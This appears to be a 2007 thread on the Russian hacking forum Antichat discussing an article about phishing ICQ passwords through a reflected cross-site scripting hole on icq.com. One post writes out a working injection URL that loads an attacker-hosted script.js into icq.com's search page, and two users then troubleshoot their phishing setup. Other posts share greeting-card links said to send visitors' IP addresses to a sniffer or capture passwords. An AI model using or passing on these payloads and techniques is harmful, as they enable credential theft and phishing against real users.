HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 20.11.2007, 19:49
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

ы ну да) да всровно кули толку на опере не утянешь, а в осле в основе сидят не просвященные с кривыми девятками, ну если тока пиарить по чатам бородина, ибо там сто пудов придеца юзать осла
 
Ответить с цитированием

  #12  
Старый 21.11.2007, 00:50
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
С нами: 11133086

Репутация: 241
По умолчанию

раскрывал тему 2 года назад: http://www.xakep.ru/magazine/xa/083/060/1.asp . Даже конкурс в номере, который мы с Шанкаром прошли, точнее я помог ему пройти на данном тапе, построили по мотивам данной темы. Кроме 9-ок между прочим ничего и не ловится.
 
Ответить с цитированием

  #13  
Старый 21.11.2007, 02:50
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
С нами: 10578566

Репутация: 1228


По умолчанию

в файле script.js смысл сначало очищать document.body.innerHTML а потом через document.write() писать, есле можно сразу присвить значение document.body.innerHTML и все)
а так норм.
 
Ответить с цитированием

  #14  
Старый 21.11.2007, 03:23
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Вторичный до мозга костей метод. Единственная ценность статьи - готовый фейк
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #15  
Старый 21.11.2007, 21:00
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами: 10495046

Репутация: 2642


По умолчанию

Цитата:
Сообщение от PinkPanther  
раскрывал тему 2 года назад: http://www.xakep.ru/magazine/xa/083/060/1.asp . Даже конкурс в номере, который мы с Шанкаром прошли, точнее я помог ему пройти на данном тапе, построили по мотивам данной темы. Кроме 9-ок между прочим ничего и не ловится.
Звеняй, не знал.
Цитата:
Сообщение от Constantine  
Вторичный до мозга костей метод. Единственная ценность статьи - готовый фейк
Да, да, да, но ведь это сайт ICQ.com, такое не часто бывает.
 
Ответить с цитированием

  #16  
Старый 02.12.2007, 16:13
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

А вот это:
_http://www.icq.com/greetings/cards/139125/krl5l551/view/

отсылает IP на снифер ачата, оч удуобно, т.к. урл беспалевный и его легче вкрячить, чем вышеописанное
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #17  
Старый 04.12.2007, 00:34
IIAHbI4
Banned
Регистрация: 24.08.2006
Сообщений: 483
С нами: 10375586

Репутация: 1112
По умолчанию

хм ... создал диру /karma , туда login.php и script.js поместил, в script.js указал путь
Цитата:
http://xxx/karma.js
, пробую открыть линк у ся в броузере
Цитата:
http://icq.com/people/?people_search=1&searched=1&gender=1;%3C/script%3E%3Cscript%20src=%22http://хххх/karma/script.js%22%3E%3C/script%3E%3Cscript%3E//
чёт грузит, и потом страница пустая =\ мож я чт не так творю?
 
Ответить с цитированием

  #18  
Старый 04.12.2007, 01:12
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
С нами: 10701583

Репутация: 81
По умолчанию

Цитата:
Сообщение от IIAHbI4  
хм ... создал диру /karma , туда login.php и script.js поместил, в script.js указал путь, пробую открыть линк у ся в броузере
чёт грузит, и потом страница пустая =\ мож я чт не так творю?

тоже самое ...
 
Ответить с цитированием

  #19  
Старый 04.12.2007, 17:10
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от NOmeR1  
Да, да, да, но ведь это сайт ICQ.com, такое не часто бывает.
согласен с Constantine

пассивные XSS на icq.com, это далеко не чудеса, их там много, как и почти везде

вот допустим это демонстрирует более изящьный метод получения паролей:
[удалил, повесил снифф]

пример взят из статьи hidden`а, сам не стал писать, сразу же скажу для тех кто боится, что ничего там не сохраняется, а выводится на экран
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 05.12.2007 в 06:34..
 
Ответить с цитированием

  #20  
Старый 04.12.2007, 22:08
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
С нами: 10701583

Репутация: 81
По умолчанию

Цитата:
Сообщение от Scipio  
согласен с Constantine

пассивные XSS на icq.com, это далеко не чудеса, их там много, как и почти везде

вот допустим это демонстрирует более изящьный метод получения паролей:
_http://www.icq.com/greetings/cards/145879/sp99l1st/view/

пример взят из статьи hidden`а, сам не стал писать, сразу же скажу для тех кто боится, что ничего там не сохраняется, а выводится на экран
Открытку с чистым php кодом залить не удается, как смогли залить http://www.icq.com/greetings/cards/145879/sp99l1st/view ?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Протиснуться через пассивную Xss Alexus PHP 4 02.07.2007 15:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.